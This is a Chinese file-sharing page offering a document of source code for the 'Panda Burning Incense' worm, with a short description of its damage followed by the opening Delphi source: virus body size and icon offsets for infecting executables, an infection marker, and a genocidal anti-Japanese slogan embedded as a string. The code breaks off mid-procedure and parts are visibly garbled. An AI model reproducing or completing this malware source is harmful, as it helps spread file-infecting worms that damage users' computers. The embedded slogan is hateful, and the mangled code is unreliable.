1 / 7
文档名称:

熊猫烧香病毒源代码.doc

格式:doc   大小:38KB   页数:7页
下载后只包含 1 个 DOC 格式的文档,没有任何的图纸或源代码,查看文件列表

如果您已付费下载过本站文档,您可以点这里二次下载

分享

预览

熊猫烧香病毒源代码.doc

上传人:tswng35 2020/7/27 文件大小:38 KB

下载得到文件列表

熊猫烧香病毒源代码.doc

文档介绍

文档介绍:“熊猫烧香”简介:“熊猫烧香”病毒是一个能在电脑操作系统上运行的蠕虫病毒。采用“熊猫烧香”头像作为图标。它的变种会感染EXE可执行文件,被病毒感染的文件图标均变为“熊猫烧香”。同时,受感染的计算机还会出现蓝屏、频繁重启以及文件被破坏等现象。该病毒会在中毒电脑中所有的网页文件尾部添加病毒代码。目前已有百万台电脑受害。program Japussy;usesWindows, SysUtils, Classes, Graphics, ShellAPI{, Registry};constHeaderSize = 82432;             //病毒体的大小IconOffset = $12EB8;           //PE文件主图标的偏移量//在我的Delphi5 SP1上面编译得到的大小,其它版本的Delphi可能不同//查找2800000020的十六进制字符串可以找到主图标的偏移量  {HeaderSize = 38912;             //Upx压缩过病毒体的大小IconOffset = $92BC;             //Upx压缩过PE文件主图标的偏移量//Upx  用法: upx -9 --8086 }IconSize   = $2E8;             //PE文件主图标的大小--744字节IconTail   = IconOffset + IconSize; //PE文件主图标的尾部ID       = $44444444;         //感染标记//垃圾码,以备写入Catchword = 'If a race need to be killed out, it must be Yamato. ' +        'If a country need to be destroyed, it must be Japan! ' +        '***  ***';{$R *.RES}function RegisterServiceProcess(dwProcessID, dwType: Integer): Integer; stdcall; external ''; //函数声明varTmpFile: string;Si:     STARTUPINFO;Pi:     PROCESS_INFORMATION;IsJap:   Boolean = False; //日文操作系统标记{ 判断是否为Win9x }function IsWin9x: Boolean;varVer: TOSVersionInfo;beginResult := False; := SizeOf(TOSVersionInfo);if not GetVersionEx(Ver) then  Exit;if ( = VER_PLATFORM_WIN32_WINDOWS) then //Win9x  Result := True;end;{ 在流之间复制 }procedure CopyStream(Src: TStream; sStartPos: Integer;